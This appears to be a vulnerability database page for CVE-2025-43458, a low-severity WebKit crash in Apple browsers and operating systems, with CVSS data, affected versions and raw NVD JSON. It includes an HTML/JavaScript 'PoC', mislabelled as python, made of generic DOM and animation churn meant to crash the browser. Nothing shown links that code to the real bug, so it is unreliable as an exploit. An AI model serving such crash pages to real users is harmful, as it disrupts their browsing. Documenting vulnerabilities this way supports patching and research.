Security Vulnerability Report
中文
CVE-2025-43458 CVSS 4.3 MEDIUM

CVE-2025-43458

Published: 2025-11-04 02:15:51
Last Modified: 2026-04-02 19:20:50
Source: [email protected]

Description

This issue was addressed through improved state management. This issue is fixed in Safari 26.1, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.1
iOS < 18.7.2
iOS < 26.1
iPadOS < 18.7.2
iPadOS < 26.1
macOS Tahoe < 26.1
tvOS < 26.1
visionOS < 26.1
watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-43458 PoC - WebKit State Management Crash --> <!DOCTYPE html> <html> <head> <title>CVE-2025-43458 PoC</title> </head> <body> <h1>CVE-2025-43458 WebKit State Management Vulnerability</h1> <p>This PoC demonstrates the state management issue that may lead to process crash.</p> <div id="target"></div> <script> // Trigger state management issue in WebKit // This may cause unexpected process crash (function() { const target = document.getElementById('target'); // Create rapid DOM manipulation to trigger state inconsistency for (let i = 0; i < 1000; i++) { const element = document.createElement('div'); element.innerHTML = '<span>' + i + '</span>'; target.appendChild(element); // Rapid style changes element.style.animation = 'none'; element.offsetHeight; // Force reflow element.style.animation = 'test 1s'; // Remove during animation if (i % 10 === 0) { element.remove(); } } // Trigger garbage collection timing issue window.onclick = function() { const elements = document.querySelectorAll('div'); elements.forEach(el => { el.style.transition = 'all 0.001s'; el.remove(); }); }; })(); </script> <style> @keyframes test { 0% { opacity: 1; } 100% { opacity: 0; } } </style> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43458", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:51.213", "lastModified": "2026-04-02T19:20:49.753", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed through improved state management. This issue is fixed in Safari 26.1, iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, tvOS 26.1, visionOS 26.1, watchOS 26.1. Processing maliciously crafted web content may lead to an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-703"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "CFF118CE-3F13-43BE-B250-5579E1C842EB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "290E0D29-CB5B-45A7-9FE3-FD2030B1D1A4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125637", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125640", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.